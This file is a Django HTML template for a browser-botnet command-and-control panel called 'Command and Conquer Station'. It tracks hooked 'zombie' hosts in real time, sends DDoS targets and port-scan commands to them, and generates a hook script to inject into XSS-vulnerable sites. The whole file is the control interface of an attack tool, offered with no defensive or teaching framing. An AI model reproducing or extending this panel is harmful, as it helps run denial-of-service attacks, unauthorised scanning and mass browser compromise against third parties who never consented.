<!doctype html>
<meta charset="UTF-8">



<html>


<head>
	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7" crossorigin="anonymous">

	<script type="text/javascript" src="{{ STATIC_URL }}js/ws4redis.js"></script>
	<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
	<script type="text/javascript" src="{{STATIC_URL}}/bootbox.min.js"></script>
	<script type="text/javascript" src="{{STATIC_URL}}/bootstrap.min.js"></script>

<script>




//cookie setup for posts
    $(function ajax_setup(){
            //get cookie for form posting
            function getCookie(name) {
                var cookieValue = null;
                if (document.cookie && document.cookie != '') {
                    var cookies = document.cookie.split(';');
                    for (var i = 0; i < cookies.length; i++) {
                        var cookie = jQuery.trim(cookies[i]);
                        // Does this cookie string begin with the name we want?
                        if (cookie.substring(0, name.length + 1) == (name + '=')) {
                            cookieValue = decodeURIComponent(cookie.substring(name.length + 1));
                            break;
                        }
                    }
                }
                return cookieValue;
            }

            var csrftoken = getCookie('csrftoken');

            function csrfSafeMethod(method) {
                // these HTTP methods do not require CSRF protection
                return (/^(GET|HEAD|OPTIONS|TRACE)$/.test(method));
            }


            $.ajaxSetup({
                beforeSend: function(xhr, settings) {
                    if (!csrfSafeMethod(settings.type) && !this.crossDomain) {
                        xhr.setRequestHeader("X-CSRFToken", csrftoken);
                    }
                }
            })
        }
    )

$(function(){
	solo_socket = WS4Redis({
		uri:'{{WEBSOCKET_URI}}attacker?subscribe-session',
		receive_message:msghandler,
		heartbeat_msg: "--heartbeat--",
	});
});


function msghandler(json){

	json = JSON.parse(json);

	if(json.hasOwnProperty('newzombieId') == true){

		$("table[name='zombies']").append(	"<tr class='active'><td id="+json['newzombieId']+">"+json['newzombieHost']+"<span class ='glyphicon glyphicon-flash'></span></td></tr>");
	}

	if(json.hasOwnProperty("host")==true){

			$("tbody[name='hosts']").append(	"<tr class='active'><td><span class ='glyphicon glyphicon-flash'>"+json['host']+"</span></td></tr>");
	}

}



function ddos(){

	var targ = $("#target").val();
	$.ajax({
		url:"{% url 'control-DDOS'%}",
		type:'POST',
		dataType:"json",
		data:{'targetip':targ}
	});
}


function portscan(){
	var targ = $("#network").val();
	$.ajax({
		url:"{% url 'control-PORTSCAN' %}",
		type: 'POST',
		dataType:"json",
		data: {'targetnet':targ},
		success: function(json){
			if(json.hasOwnProperty('ack')==true){
				bootbox.alert("Port scan started");
			}
			else if(json.hasOwnProperty('failed')==true){
				bootbox.alert("Port scan failed");
			}
		}
	});

}

function cancel(){
		$.ajax({
			url:"{% url 'control-Cancel'%}",
			type: 'POST',
			dataType: "json",
			data:{}
		});

}

function createHook(){
	var ipserver = $('#server_ip').val()
	$.ajax({
			url: "{%url 'injection'%}",
			type: 'POST',
			dataType: "json",
			data:{'server_ip':ipserver},
			success: function(json){

				var scpt = '"'+String(json['resp'])+'"';
				bootbox.alert("Inject script with "+ scpt+ " to XSS vulnerable target.\n Script is located in current working directory.");
			}
	});
}
$(function(){$(".ddos").hide();})
$(function(){$(".portscan").hide();})
$(function(){$(".hosts").hide();})

function drop(input){ $("."+input).toggle();

	if(input.match("portscan")){

		$(".hosts").toggle();
	}

}


</script>

</head>

<body>
<div class="row">
	<div class="col-md-12">
			<div class="page-header">
				<h1 style="text-align: center;"> <small>Command and Conquer Station</small></h1>
			</div>
		</div>
	</div>
<div class="row">
	<div class="col-md-4">

		<div class="zombies">
				<h1 style="text-align: center;"><small>Zombies</small></h1>
			<table class ="table table-condensed" name="zombies">
				<tbody>
				{%for zombie in zombies%}
				<tr class="active">
					<td id={{zombie.id}}>{{zombie.host}} <span class ="glyphicon glyphicon-flash"></span></td>
				</tr>
				{%endfor%}
			</tbody>
			</table>
		</div>
	</div>

	<div class="col-md-4 col-md-offset-15">

		<div class="create-injection">
			<div class="form-inline" >
				<div class="form-group">
					{% csrf_token %}

					<input type="text" class="form-control" id="server_ip" placeholder="server ip">
				</div>
					<button onclick="createHook();" class="btn btn-default">Create Hook</button>
				</div>
		</div>

		<div class="attacks" >

		<table class="table table-bordered" >
			<tbody>

				<td>
					<h1 style="text-align: center;"><small>Attacks</small></h1>
				</td>
			</tr>
			<tr>
				<td><button style="width: 100%;" onclick="drop('ddos');" class="btn btn-default"> DDOS</button></td>
				</tr>
			<tr>
					<td><button style="width: 100%;" onclick="drop('portscan');" class="btn btn-default">PORT SCAN</button</td>
				</tr>

		</tbody>
		</table>

		</div>

	</div>

	<div class="col-md-4 col-md-offset-20">
		<h1 style="text-align:center;" > <small>Current Attack</small></h1>
		<div class="ddos">
		<div class="form-inline" >
			<div class="form-group">
				<label for="target">DDOS Target</label>
				<input type="text" class="form-control" id="target" placeholder="ddos target">
			</div>

			<button onclick="ddos();" class="btn btn-default">Start Attack</button>
			<button onclick="cancel();" class="btn btn-default">Cancel</button>
		</div>
		</div>


		<div class="portscan">
			<div class="form-inline">
				<div class="form-group">
					<label for="network">Network Target</label>
					<input type="text" clas="form-control" id="network" placeholder="target zombie">
				</div>
				<button onclick="portscan();" class="btn btn-default">Start Attack</button>
			</div>
		</div>




		<div class="hosts">
				<h1 style="text-align: center;"><small>Scanned Hosts</small></h1>
			<table class ="table table-condensed" >
				<tbody name="hosts">
			</tbody>
			</table>
		</div>




	</div>
</div>









</body>

</html>
